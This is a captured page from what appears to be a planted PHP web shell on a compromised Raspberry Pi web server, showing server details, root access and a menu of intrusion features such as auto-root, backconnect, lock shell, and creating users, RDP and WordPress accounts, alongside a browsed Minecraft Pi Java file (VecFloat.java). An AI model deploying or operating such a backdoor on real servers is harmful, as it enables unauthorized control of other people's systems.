Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
minecraft-pi /
api /
java /
src-api /
pi /
[ HOME SHELL ]
Name
Size
Permission
Action
event
[ DIR ]
drwxr-xr-x
tool
[ DIR ]
drwxr-xr-x
Block.java
3.68
KB
-rw-r--r--
Color.java
329
B
-rw-r--r--
Connection.java
2.95
KB
-rw-r--r--
EventFactory.java
1
KB
-rw-r--r--
Item.java
2.41
KB
-rw-r--r--
Log.java
330
B
-rw-r--r--
Minecraft.java
7.26
KB
-rw-r--r--
Vec.java
2.13
KB
-rw-r--r--
VecFloat.java
1.84
KB
-rw-r--r--
package.html
36
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : VecFloat.java
package pi; import java.util.Scanner; /** * A vector of three floats * * @author Daniel Frisk, twitter:danfrisk */ public class VecFloat { public static final VecFloat ZERO = new VecFloat(0, 0, 0); public final float x, y, z; VecFloat(float x, float y, float z) { this.x = x; this.y = y; this.z = z; } /** * Create */ public static VecFloat xyz(float x, float y, float z) { return new VecFloat(x, y, z); } /** * Add */ public VecFloat add(VecFloat v) { return xyz(x + v.x, y + v.y, z + v.z); } /** * Subtract */ public VecFloat sub(VecFloat v) { return xyz(x - v.x, y - v.y, z - v.z); } /** * Multiply with a float (scale) */ public VecFloat mul(float s) { return xyz(s * x, s * y, s * z); } /** * Negate (multiply with -1) */ public VecFloat neg() { return mul(-1); } /** * Scalar product */ public float dot(VecFloat v) { return x * v.x + y * v.y + z * v.z; } /** * Cross product */ VecFloat cross(VecFloat v) { throw new UnsupportedOperationException("not implemented yet"); } /** * Get a vector in the same direction but with length 1 */ public VecFloat normalized() { return mul(1f / length()); } /** * Length */ public float length() { return (float) Math.sqrt(lengthSq()); } /** * length * length */ public float lengthSq() { return dot(this); } static VecFloat decode(String encoded) { Scanner s = new Scanner(encoded).useDelimiter("\\,"); return xyz(s.nextFloat(), s.nextFloat(), s.nextFloat()); } @Override public final String toString() { return x + "," + y + "," + z; } }
Close